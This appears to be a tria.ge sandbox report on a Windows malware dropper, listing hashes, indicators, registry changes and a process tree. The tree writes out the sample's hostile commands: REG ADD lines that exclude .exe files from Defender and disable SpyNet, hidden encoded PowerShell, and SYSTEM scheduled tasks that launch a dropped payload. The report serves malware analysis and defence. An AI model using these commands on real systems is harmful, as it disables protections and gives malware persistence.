Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
91s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
06/02/2023, 10:56
Static task
static1
Behavioral task
behavioral1
Sample
627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe
Resource
win7-20220901-en
General
-
Target
627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe
-
Size
7.3MB
-
MD5
e9df6a41ca4941817e0da65dd35d6508
-
SHA1
d1efb6b9745f5fcf6f34a0e4f7d148133a4289eb
-
SHA256
627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c
-
SHA512
7b850ea47e68386168db3d64e094347ebb87717d690a395352084cf8dd334449f382dff75eba04770e112ec85f742204d4ac592a1513327c5588c10f28490f54
-
SSDEEP
196608:91OTdISgFWHU76tSdBQ2EfgFLfCceIqTMf:3OTGy0WS/QloFLbe+
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 111 3328 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation BPTxocp.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Install.exe -
Executes dropped EXE 4 IoCs
pid Process 3804 Install.exe 1532 Install.exe 1336 jJeKaBi.exe 4876 BPTxocp.exe -
Loads dropped DLL 1 IoCs
pid Process 3328 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json BPTxocp.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini BPTxocp.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol jJeKaBi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 BPTxocp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 BPTxocp.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini jJeKaBi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA BPTxocp.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA BPTxocp.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 BPTxocp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA BPTxocp.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak BPTxocp.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak BPTxocp.exe File created C:\Program Files (x86)\phVJOPZyZJOU2\OHkMzQnNjMomW.dll BPTxocp.exe File created C:\Program Files (x86)\NCzfTsUHwfUn\GiGykRm.dll BPTxocp.exe File created C:\Program Files (x86)\wRZxVByAcqfAC\buiJeUm.xml BPTxocp.exe File created C:\Program Files (x86)\JuPVqtTuU\HMQNMm.dll BPTxocp.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi BPTxocp.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja BPTxocp.exe File created C:\Program Files (x86)\phVJOPZyZJOU2\ZsJuKYO.xml BPTxocp.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi BPTxocp.exe File created C:\Program Files (x86)\JuPVqtTuU\ZDJrKBR.xml BPTxocp.exe File created C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\oowRbnY.dll BPTxocp.exe File created C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\wRkuupv.xml BPTxocp.exe File created C:\Program Files (x86)\wRZxVByAcqfAC\JPcIrlh.dll BPTxocp.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\ygwXmmYWmIOQZqgey.job schtasks.exe File created C:\Windows\Tasks\HnhGGmYUcuANzZs.job schtasks.exe File created C:\Windows\Tasks\ClHbhijVssadMpWzU.job schtasks.exe File created C:\Windows\Tasks\bsajrHInQFlcwYICLj.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2892 schtasks.exe 1840 schtasks.exe 3584 schtasks.exe 3520 schtasks.exe 1104 schtasks.exe 3388 schtasks.exe 1840 schtasks.exe 3284 schtasks.exe 4016 schtasks.exe 1512 schtasks.exe 2708 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket BPTxocp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" BPTxocp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" BPTxocp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing BPTxocp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000} BPTxocp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" BPTxocp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000}\MaxCapacity = "15140" BPTxocp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000}\NukeOnDelete = "0" BPTxocp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume BPTxocp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" BPTxocp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" BPTxocp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix BPTxocp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" BPTxocp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 2120 powershell.EXE 2120 powershell.EXE 4780 powershell.exe 4780 powershell.exe 4388 powershell.exe 4388 powershell.exe 5056 powershell.EXE 5056 powershell.EXE 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe 4876 BPTxocp.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2120 powershell.EXE Token: SeDebugPrivilege 4780 powershell.exe Token: SeDebugPrivilege 4388 powershell.exe Token: SeDebugPrivilege 5056 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4572 wrote to memory of 3804 4572 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe 79 PID 4572 wrote to memory of 3804 4572 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe 79 PID 4572 wrote to memory of 3804 4572 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe 79 PID 3804 wrote to memory of 1532 3804 Install.exe 80 PID 3804 wrote to memory of 1532 3804 Install.exe 80 PID 3804 wrote to memory of 1532 3804 Install.exe 80 PID 1532 wrote to memory of 920 1532 Install.exe 81 PID 1532 wrote to memory of 920 1532 Install.exe 81 PID 1532 wrote to memory of 920 1532 Install.exe 81 PID 1532 wrote to memory of 1932 1532 Install.exe 83 PID 1532 wrote to memory of 1932 1532 Install.exe 83 PID 1532 wrote to memory of 1932 1532 Install.exe 83 PID 920 wrote to memory of 4876 920 forfiles.exe 85 PID 920 wrote to memory of 4876 920 forfiles.exe 85 PID 920 wrote to memory of 4876 920 forfiles.exe 85 PID 1932 wrote to memory of 4860 1932 forfiles.exe 86 PID 1932 wrote to memory of 4860 1932 forfiles.exe 86 PID 1932 wrote to memory of 4860 1932 forfiles.exe 86 PID 4876 wrote to memory of 5024 4876 cmd.exe 87 PID 4876 wrote to memory of 5024 4876 cmd.exe 87 PID 4876 wrote to memory of 5024 4876 cmd.exe 87 PID 4860 wrote to memory of 4868 4860 cmd.exe 88 PID 4860 wrote to memory of 4868 4860 cmd.exe 88 PID 4860 wrote to memory of 4868 4860 cmd.exe 88 PID 4860 wrote to memory of 5052 4860 cmd.exe 90 PID 4876 wrote to memory of 2220 4876 cmd.exe 89 PID 4860 wrote to memory of 5052 4860 cmd.exe 90 PID 4860 wrote to memory of 5052 4860 cmd.exe 90 PID 4876 wrote to memory of 2220 4876 cmd.exe 89 PID 4876 wrote to memory of 2220 4876 cmd.exe 89 PID 1532 wrote to memory of 2892 1532 Install.exe 91 PID 1532 wrote to memory of 2892 1532 Install.exe 91 PID 1532 wrote to memory of 2892 1532 Install.exe 91 PID 1532 wrote to memory of 3748 1532 Install.exe 93 PID 1532 wrote to memory of 3748 1532 Install.exe 93 PID 1532 wrote to memory of 3748 1532 Install.exe 93 PID 2120 wrote to memory of 2116 2120 powershell.EXE 97 PID 2120 wrote to memory of 2116 2120 powershell.EXE 97 PID 1532 wrote to memory of 5064 1532 Install.exe 104 PID 1532 wrote to memory of 5064 1532 Install.exe 104 PID 1532 wrote to memory of 5064 1532 Install.exe 104 PID 1532 wrote to memory of 1840 1532 Install.exe 106 PID 1532 wrote to memory of 1840 1532 Install.exe 106 PID 1532 wrote to memory of 1840 1532 Install.exe 106 PID 1336 wrote to memory of 4780 1336 jJeKaBi.exe 114 PID 1336 wrote to memory of 4780 1336 jJeKaBi.exe 114 PID 1336 wrote to memory of 4780 1336 jJeKaBi.exe 114 PID 4780 wrote to memory of 2240 4780 powershell.exe 116 PID 4780 wrote to memory of 2240 4780 powershell.exe 116 PID 4780 wrote to memory of 2240 4780 powershell.exe 116 PID 2240 wrote to memory of 2144 2240 cmd.exe 117 PID 2240 wrote to memory of 2144 2240 cmd.exe 117 PID 2240 wrote to memory of 2144 2240 cmd.exe 117 PID 4780 wrote to memory of 2012 4780 powershell.exe 118 PID 4780 wrote to memory of 2012 4780 powershell.exe 118 PID 4780 wrote to memory of 2012 4780 powershell.exe 118 PID 4780 wrote to memory of 2168 4780 powershell.exe 119 PID 4780 wrote to memory of 2168 4780 powershell.exe 119 PID 4780 wrote to memory of 2168 4780 powershell.exe 119 PID 4780 wrote to memory of 4180 4780 powershell.exe 120 PID 4780 wrote to memory of 4180 4780 powershell.exe 120 PID 4780 wrote to memory of 4180 4780 powershell.exe 120 PID 4780 wrote to memory of 1892 4780 powershell.exe 121 PID 4780 wrote to memory of 1892 4780 powershell.exe 121
Processes
-
C:\Users\Admin\AppData\Local\Temp\627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe"C:\Users\Admin\AppData\Local\Temp\627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Users\Admin\AppData\Local\Temp\7zS78FD.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Users\Admin\AppData\Local\Temp\7zS7EF9.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:5024
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2220
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4860 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4868
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:5052
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzyKvbkdY" /SC once /ST 08:11:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzyKvbkdY"4⤵PID:3748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzyKvbkdY"4⤵PID:5064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bsajrHInQFlcwYICLj" /SC once /ST 11:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\nuKOVfXXHsnqFlD\jJeKaBi.exe\" yn /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1840
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2116
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:216
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\nuKOVfXXHsnqFlD\jJeKaBi.exeC:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\nuKOVfXXHsnqFlD\jJeKaBi.exe yn /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1336 -
